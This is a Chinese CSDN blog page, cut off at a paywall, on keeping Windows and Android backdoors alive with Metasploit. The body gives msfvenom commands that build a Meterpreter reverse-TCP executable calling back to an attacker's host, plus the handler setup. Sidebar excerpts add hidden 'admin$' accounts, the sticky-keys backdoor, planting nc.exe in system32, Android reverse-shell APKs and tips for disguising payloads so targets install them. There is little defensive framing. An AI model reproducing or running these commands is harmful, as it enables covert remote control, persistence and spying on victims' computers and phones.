windows/android后门的维持

最新推荐文章于 2024-05-27 09:41:00 发布
最新推荐文章于 2024-05-27 09:41:00 发布
阅读量587 收藏 15
点赞数 1
分类专栏: 安全 教程 文章标签: android windows MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41343528/article/details/119548577
版权
本文介绍了如何在Kali Linux环境下利用MSF(Metasploit Framework)搭建环境,探讨了Windows系统和Android设备后门的维持技巧,涵盖了后门安装、更新及远程控制等关键环节。
摘要由CSDN通过智能技术生成

搭建环境:kali linux,MSF

windons后门维持

// 先创建一个后门payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe
// 打开msf控制台,并完成相关设置
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
set Exito
最低0.47元/天 解锁文章
bingxinid
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows/android后门维持
QQ_1519938366的博客
02-12 322
【代码】windows/android后门维持
完整B/S后门开发实战VC源代码
03-15
在IT安全领域,"B/S后门"是一个重要的概念,主要涉及到网络应用程序的安全性。B/S架构(Browser/Server,浏览器/服务器模式)是互联网应用的常见模型,用户通过浏览器访问服务器上的应用。后门,顾名思义,是指在...
安卓后门工具:backdoor-apk 教程
Sumarua的博客
07-26 7093
文章目录安卓后门工具:backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下:3、在当前目录下,我们可以看到一个脚本文件。4、Android清单权限选项:如何判断后门APK是否生成 成功?5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:6、同时,我将生成的带有后门的 AP
推荐开源项目:Androspy - 安卓平台的全能后门工具
最新发布
gitblog_00005的博客
05-27 499
推荐开源项目:Androspy - 安卓平台的全能后门工具 项目地址:https://gitcode.com/Cyb0r9/Androspy 1、项目介绍 Androspy是一个由Belahsan Ouerghi开发的高级安卓后门加密和创建工具,它集成了自动IP中毒功能。这个项目旨在提供一个强大的安全测试平台,允许安全专家和研究人员对安卓应用进行深度渗透测试和漏洞评估。 2、项目技术分析 Andr...
Linux后门权限维持手法
weixin_30861797的博客
03-20 707
0x01 Linux 1. 预加载型动态链接库后门 inux操作系统的动态链接库在加载过程中,动态链接器会先读取LD_PRELOAD环境变量和默认配置文件/etc/ld.so.preload,并将读取到的动态链接库文件进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD环境变量和/etc/ld.so.preload配置文件中指定的动态链接库依然会被装载,因为它们的优先级比LD_...
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6336
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4367
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
后渗透之各种维持权限后门原理即利用
p_utao的博客
09-13 3583
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
Windows服务与后门技术.zip
03-28
Windows服务与后门技术.zip
android后门程序
05-19
Android系统中,后门程序通常是指未经用户许可,秘密收集用户数据并将其发送到远程服务器的应用或服务。这类程序可能会严重侵犯用户的隐私,因为它们能够获取敏感信息,如短信记录、通讯录以及GPS定位信息。 一、...
Nteam官网程序全解版/移除后门授权
05-12
Nteam官网程序全解版/移除后门授权 NanGe Nteam 该项目适用于团队/工作室等类型,全站由layui强力驱动,及光年后台模板的使用 团队介绍、项目展示、成员列表等 成员申请、作品申请、成员真假查询、人机验证 多管理员...
msfvenom-backdoor-android:Android后门应用程序,msfvenom android .apk的改进源代码-Android app source code
03-24
msfvenom-backdoor-androidAndroid Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透到Android系统的过程指南,请访问我的网站(仅意大利语) 尝试解决问题: [*]Meterpreter session x closed - Reason:died 消息,通过在服务中启动有效负载来实现。 Meterpreter会话以这种方式更加稳定(原始的msfvenom apk通常会导致会话很快终止) 在此项目中,后门可在LAN设置中工作,在端口4444上打开到192.168.178.30的Meterpreter会话(如果要在WA
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
权限维持(什么是后门?如何留后门?)-Windows篇 (゚益゚メ) 渗透测试
寻觅的博客
09-12 2246
来看看如何做开机自启!我们渗透一定要持久!
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 441
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
后渗透——权限维持
FisrtBqy的博客
04-26 2143
权限维持 1 Windows权限维持 1.1 用户维持(克隆账号) 1.1.1 添加一般隐藏用户的方式 net user username$ passwd /add 使用net user命令查看用户,发现没有username$这个用户 但是通过控制面板→管理账户中可以看到该用户。 1.1.2 注册表克隆用户隐藏 需要先完成上一步🙄 打开注册表编辑器:Win+R→regedit,找到如下路径: 发现SAM路径下没有权限查看,这里修改权限:菜单栏编辑→权限,修改后F5刷新
android devik进程,suckit后门程序的分析 (二)
weixin_33570610的博客
05-28 290
这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进。看看我写的就知道他的精妙之处了!关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过!:P[root@Learning sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configur...
揭秘恶意软件:OSX/FRUITFLY后门分析
这份报告关注的是针对macOS平台的高级恶意软件——OSX/FruitFly.B,一个具有创新性和智能性的后门程序。作者旨在揭示这款恶意软件的工作原理、任务执行机制以及它如何通过定制的控制与通信(C&C)服务器进行通信。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值